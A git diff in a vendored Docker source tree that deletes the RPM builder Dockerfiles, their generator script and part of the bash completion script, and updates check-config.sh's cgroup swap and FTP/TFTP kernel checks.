/dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM centos:7 - -RUN yum groupinstall -y "Development Tools" -RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs -RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile deleted file mode 100644 index af040c5c9f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM fedora:24 - -RUN dnf -y upgrade -RUN dnf install -y @development-tools fedora-packager -RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile deleted file mode 100644 index 98e57a9c4b..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM fedora:25 - -RUN dnf -y upgrade -RUN dnf install -y @development-tools fedora-packager -RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh deleted file mode 100755 index 6f93afafa3..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh +++ /dev/null @@ -1,189 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh centos-7 -# to only update centos-7/Dockerfile -# or: ./generate.sh fedora-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - installer=yum - - if [[ "$distro" == "fedora" ]]; then - installer=dnf - fi - if [[ "$distro" == "photon" ]]; then - installer=tdnf - fi - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! - # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - extraBuildTags='pkcs11' - runcBuildTags= - - case "$from" in - oraclelinux:6) - # We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version - # This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo - echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4" >> "$version/Dockerfile" - echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - fedora:*) - echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile" - ;; - *) ;; - esac - - case "$from" in - centos:*) - # get "Development Tools" packages dependencies - echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" - - if [[ "$version" == "centos-7" ]]; then - echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile" - fi - ;; - oraclelinux:*) - # get "Development Tools" packages and dependencies - # we also need yum-utils for yum-config-manager to pull the latest repo file - echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile" - ;; - opensuse:*) - # get rpm-build and curl packages and dependencies - echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile" - ;; - photon:*) - echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile" - ;; - *) - echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile" - ;; - esac - - packages=( - btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible) - device-mapper-devel # for "libdevmapper.h" - glibc-static - libseccomp-devel # for "seccomp.h" & "libseccomp.so" - libselinux-devel # for "libselinux.so" - libtool-ltdl-devel # for pkcs11 "ltdl.h" - pkgconfig # for the pkg-config command - selinux-policy - selinux-policy-devel - sqlite-devel # for "sqlite3.h" - systemd-devel # for "sd-journal.h" and libraries - tar # older versions of dev-tools do not have tar - git # required for containerd and runc clone - cmake # tini build - vim-common # tini build - ) - - case "$from" in - oraclelinux:7) - # Enable the optional repository - packages=( --enablerepo=ol7_optional_latest "${packages[*]}" ) - ;; - esac - - case "$from" in - oraclelinux:6) - # doesn't use systemd, doesn't have a devel package for it - packages=( "${packages[@]/systemd-devel}" ) - ;; - esac - - # opensuse & oraclelinx:6 do not have the right libseccomp libs - case "$from" in - opensuse:*|oraclelinux:6) - packages=( "${packages[@]/libseccomp-devel}" ) - runcBuildTags="selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="seccomp selinux" - ;; - esac - - case "$from" in - opensuse:*) - packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" ) - packages=( "${packages[@]/pkgconfig/pkg-config}" ) - packages=( "${packages[@]/vim-common/vim}" ) - if [[ "$from" == "opensuse:13."* ]]; then - packages+=( systemd-rpm-macros ) - fi - - # use zypper - echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile" - ;; - photon:*) - packages=( "${packages[@]/pkgconfig/pkg-config}" ) - echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" - ;; - *) - echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile" - ;; - esac - - echo >> "$version/Dockerfile" - - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - case "$from" in - oraclelinux:6) - # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff. - # The ordering is very important and should not be changed. - echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \' >> "$version/Dockerfile" - echo ' -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - ;; - *) ;; - esac - - -done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile deleted file mode 100644 index addd431508..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM opensuse:13.2 - -RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build -RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 selinux -ENV RUNC_BUILDTAGS selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile deleted file mode 100644 index c34d3046dd..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile +++ /dev/null @@ -1,28 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM oraclelinux:6 - -RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4 -RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek - -RUN yum groupinstall -y "Development Tools" -RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 selinux -ENV RUNC_BUILDTAGS selinux - -ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \ - -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile deleted file mode 100644 index 378536b647..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM oraclelinux:7 - -RUN yum groupinstall -y "Development Tools" -RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile deleted file mode 100644 index b77d573d9f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile +++ /dev/null @@ -1,18 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"! -# - -FROM photon:1.0 - -RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils -RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS seccomp selinux - diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh index d07e4ce368..88eb8aa753 100755 --- a/vendor/github.com/docker/docker/contrib/check-config.sh +++ b/vendor/github.com/docker/docker/contrib/check-config.sh @@ -217,9 +217,13 @@ echo 'Optional Features:' check_flags CGROUP_PIDS } { + CODE=${EXITCODE} check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED - if is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then - echo " $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)" + if [ -e /sys/fs/cgroup/memory/memory.memsw.limit_in_bytes ]; then + echo " $(wrap_color '(cgroup swap accounting is currently enabled)' bold black)" + EXITCODE=${CODE} + elif is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then + echo " $(wrap_color '(cgroup swap accounting is currently not enabled, you can enable it by setting boot option "swapaccount=1")' bold black)" fi } { @@ -293,6 +297,8 @@ echo ' - "'$(wrap_color 'ipvlan' blue)'":' check_flags IPVLAN | sed 's/^/ /' echo ' - "'$(wrap_color 'macvlan' blue)'":' check_flags MACVLAN DUMMY | sed 's/^/ /' +echo ' - "'$(wrap_color 'ftp,tftp client in container' blue)'":' +check_flags NF_NAT_FTP NF_CONNTRACK_FTP NF_NAT_TFTP NF_CONNTRACK_TFTP | sed 's/^/ /' # only fail if no storage drivers available CODE=${EXITCODE} diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS deleted file mode 100644 index 03ee2dde3d..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS +++ /dev/null @@ -1,2 +0,0 @@ -Tianon Gravi (@tianon) -Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker deleted file mode 100644 index 7ea5d9a9f4..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/bash/docker +++ /dev/null @@ -1,4282 +0,0 @@ -#!/bin/bash -# -# bash completion file for core docker commands -# -# This script provides completion of: -# - commands and their options -# - container ids and names -# - image repos and tags -# - filepaths -# -# To enable the completions either: -# - place this file in /etc/bash_completion.d -# or -# - copy this file to e.g. ~/.docker-completion.sh and add the line -# below to your .bashrc after bash completion features are loaded -# . ~/.docker-completion.sh -# -# Configuration: -# -# For several commands, the amount of completions can be configured by -# setting environment variables. -# -# DOCKER_COMPLETION_SHOW_CONTAINER_IDS -# DOCKER_COMPLETION_SHOW_NETWORK_IDS -# DOCKER_COMPLETION_SHOW_NODE_IDS -# DOCKER_COMPLETION_SHOW_PLUGIN_IDS -# DOCKER_COMPLETION_SHOW_SECRET_IDS -# DOCKER_COMPLETION_SHOW_SERVICE_IDS -# "no" - Show names only (default) -# "yes" - Show names and ids -# -# You can tailor completion for the "events", "history", "inspect", "run", -# "rmi" and "save" commands by settings the following environment -# variables: -# -# DOCKER_COMPLETION_SHOW_IMAGE_IDS -# "none" - Show names only (default) -# "non-intermediate" - Show names and ids, but omit intermediate image IDs -# "all" - Show names and ids, including intermediate image IDs -# -# DOCKER_COMPLETION_SHOW_TAGS -# "yes" - include tags in completion options (default) -# "no" - don't include tags in completion options - -# -# Note: -# Currently, the completions will not work if the docker daemon is not -# bound to the default communication port/socket -# If the docker daemon is using a unix socket for communication your user -# must have access to the socket for the completions to function correctly -# -# Note for developers: -# Please arrange options sorted alphabetically by long name with the short -# options immediately following their corresponding long form. -# This order should be applied to lists, alternatives and code blocks. - -__docker_previous_extglob_setting=$(shopt -p extglob) -shopt -s extglob - -__docker_q() { - docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@" -} - -# __docker_containers returns a list of containers. Additional options to -# `docker ps` may be specified in order to filter the list, e.g. -# `__docker_containers --filter status=running` -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -__docker_containers() { - local format - if [ "$1" = "--id" ] ; then - format='{{.ID}}' - shift - elif [ "$1" = "--name" ] ; then - format='{{.Names}}' - shift - elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then - format='{{.ID}} {{.Names}}' - else - format='{{.Names}}' - fi - __docker_q ps --format "$format" "$@" -} - -# __docker_complete_containers applies completion of containers based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_containers`. -__docker_complete_containers() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") ) -} - -__docker_complete_containers_all() { - __docker_complete_containers "$@" --all -} - -__docker_complete_containers_running() { - __docker_complete_containers "$@" --filter status=running -} - -__docker_complete_containers_stopped() { - __docker_complete_containers "$@" --filter status=exited -} - -__docker_complete_containers_unpauseable() { - __docker_complete_containers "$@" --filter status=paused -} - -__docker_complete_container_names() { - local containers=( $(__docker_q ps -aq --no-trunc) ) - local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") ) - names=( "${names[@]#/}" ) # trim off the leading "/" from the container names - COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") ) -} - -__docker_complete_container_ids() { - local containers=( $(__docker_q ps -aq) ) - COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") ) -} - -__docker_images() { - local images_args="" - - case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in - all) - images_args="--no-trunc -a" - ;; - non-intermediate) - images_args="--no-trunc" - ;; - esac - - local repo_print_command - if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then - repo_print_command='print $1; print $1":"$2' - else - repo_print_command='print $1' - fi - - local awk_script - case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in - all|non-intermediate) - awk_script='NR>1 { print $3; if ($1 != "") { '"$repo_print_command"' } }' - ;; - none|*) - awk_script='NR>1 && $1 != "" { '"$repo_print_command"' }' - ;; - esac - - __docker_q images $images_args | awk "$awk_script" | grep -v '$' -} - -__docker_complete_images() { - COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") ) - __ltrim_colon_completions "$cur" -} - -__docker_complete_image_repos() { - local repos="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1 }')" - COMPREPLY=( $(compgen -W "$repos" -- "$cur") ) -} - -__docker_complete_image_repos_and_tags() { - local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "" { print $1; print $1":"$2 }')" - COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") ) - __ltrim_colon_completions "$cur" -} - -# __docker_networks returns a list of all networks. Additional options to -# `docker network ls` may be specified in order to filter the list, e.g. -# `__docker_networks --filter type=custom` -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -__docker_networks() { - local format - if [ "$1" = "--id" ] ; then - format='{{.ID}}' - shift - elif [ "$1" = "--name" ] ; then - format='{{.Name}}' - shift - elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then - format='{{.ID}} {{.Name}}' - else - format='{{.Name}}' - fi - __docker_q network ls --format "$format" "$@" -} - -# __docker_complete_networks applies completion of networks based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_networks`. -__docker_complete_networks() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") ) -} - -__docker_complete_containers_in_network() { - local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1") - COMPREPLY=( $(compgen -W "$containers" -- "$cur") ) -} - -# __docker_volumes returns a list of all volumes. Additional options to -# `docker volume ls` may be specified in order to filter the list, e.g. -# `__docker_volumes --filter dangling=true` -# Because volumes do not have IDs, this function does not distinguish between -# IDs and names. -__docker_volumes() { - __docker_q volume ls -q "$@" -} - -# __docker_complete_volumes applies completion of volumes based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_volumes`. -__docker_complete_volumes() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") ) -} - -# __docker_plugins_bundled returns a list of all plugins of a given type. -# The type has to be specified with the mandatory option `--type`. -# Valid types are: Network, Volume, Authorization. -# Completions may be added or removed with `--add` and `--remove` -# This function only deals with plugins that come bundled with Docker. -# For plugins managed by `docker plugin`, see `__docker_plugins_installed`. -__docker_plugins_bundled() { - local type add=() remove=() - while true ; do - case "$1" in - --type) - type="$2" - shift 2 - ;; - --add) - add+=("$2") - shift 2 - ;; - --remove) - remove+=("$2") - shift 2 - ;; - *) - break - ;; - esac - done - - local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p")) - for del in "${remove[@]}" ; do - plugins=(${plugins[@]/$del/}) - done - echo "${plugins[@]} ${add[@]}" -} - -# __docker_complete_plugins_bundled applies completion of plugins based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# The plugin type has to be specified with the next option `--type`. -# This function only deals with plugins that come bundled with Docker. -# For completion of plugins managed by `docker plugin`, see -# `__docker_complete_plugins_installed`. -__docker_complete_plugins_bundled() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") ) -} - -# __docker_plugins_installed returns a list of all plugins that were installed with -# the Docker plugin API. -# By default, only names are returned. -# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs. -# For built-in pugins, see `__docker_plugins_bundled`. -__docker_plugins_installed() { - local fields - if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then - fields='$1,$2' - else - fields='$2' - fi - __docker_q plugin ls | awk "NR>1 {print $fields}" -} - -# __docker_complete_plugins_installed applies completion of plugins that were installed -# with the Docker plugin API, based on the current value of `$cur` or the value of -# the optional first option `--cur`, if given. -# For completion of built-in pugins, see `__docker_complete_plugins_bundled`. -__docker_complete_plugins_installed() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") ) -} - -__docker_runtimes() { - __docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p' -} - -__docker_complete_runtimes() { - COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") ) -} - -# __docker_secrets returns a list of all secrets. -# By default, only names of secrets are returned. -# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets. -__docker_secrets() { - local fields='$2' # default: name only - [ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name - - __docker_q secret ls | awk "NR>1 {print $fields}" -} - -# __docker_complete_secrets applies completion of secrets based on the current value -# of `$cur`. -__docker_complete_secrets() { - COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") ) -} - -# __docker_stacks returns a list of all stacks. -__docker_stacks() { - __docker_q stack ls | awk 'NR>1 {print $1}' -} - -# __docker_complete_stacks applies completion of stacks based on the current value -# of `$cur` or the value of the optional first option `--cur`, if given. -__docker_complete_stacks() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") ) -} - -# __docker_nodes returns a list of all nodes. Additional options to -# `docker node ls` may be specified in order to filter the list, e.g. -# `__docker_nodes --filter role=manager` -# By default, only node names are returned. -# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -# Completions may be added with `--add`, e.g. `--add self`. -__docker_nodes() { - local add=() - local fields='$2' # default: node name only - [ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name - - while true ; do - case "$1" in - --id) - fields='$1' # IDs only - shift - ;; - --name) - fields='$2' # names only - shift - ;; - --add) - add+=("$2") - shift 2 - ;; - *) - break - ;; - esac - done - - echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}" -} - -# __docker_complete_nodes applies completion of nodes based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_nodes`. -__docker_complete_nodes() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") ) -} - -__docker_complete_nodes_plus_self() { - __docker_complete_nodes --add self "$@" -} - -# __docker_services returns a list of all services. Additional options to -# `docker service ls` may be specified in order to filter the list, e.g. -# `__docker_services --filter name=xxx` -# By default, only node names are returned. -# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs. -# An optional first option `--id|--name` may be used to limit the -# output to the IDs or names of matching items. This setting takes -# precedence over the environment setting. -__docker_services() { - local fields='$2' # default: service name only - [ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name - - if [ "$1" = "--id" ] ; then - fields='$1' # IDs only - shift - elif [ "$1" = "--name" ] ; then - fields='$2' # names only - shift - fi - __docker_q service ls "$@" | awk "NR>1 {print $fields}" -} - -# __docker_complete_services applies completion of services based on the current -# value of `$cur` or the value of the optional first option `--cur`, if given. -# Additional filters may be appended, see `__docker_services`. -__docker_complete_services() { - local current="$cur" - if [ "$1" = "--cur" ] ; then - current="$2" - shift 2 - fi - COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") ) -} - -# __docker_append_to_completions appends the word passed as an argument to every -# word in `$COMPREPLY`. -# Normally you do this with `compgen -S` while generating the completions. -# This function allows you to append a suffix later. It allows you to use -# the __docker_complete_XXX functions in cases where you need a suffix. -__docker_append_to_completions() { - COMPREPLY=( ${COMPREPLY[@]/%/"$1"} ) -} - -# __docker_is_experimental tests whether the currently configured Docker daemon -# runs in experimental mode. If so, the function exits with 0 (true). -# Otherwise, or if the result cannot be determined, the exit value is 1 (false). -__docker_is_experimental() { - [ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ] -} - -# __docker_pos_first_nonflag finds the position of the first word that is neither -# option nor an option's argument. If there are options that require arguments, -# you should pass a glob describing those options, e.g. "--option1|-o|--option2" -# Use this function to restrict completions to exact positions after the argument list. -__docker_pos_first_nonflag() { - local argument_flags=$1 - - local counter=$((${subcommand_pos:-${command_pos}} + 1)) - while [ $counter -le $cword ]; do - if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then - (( counter++ )) - # eat "=" in case of --option=arg 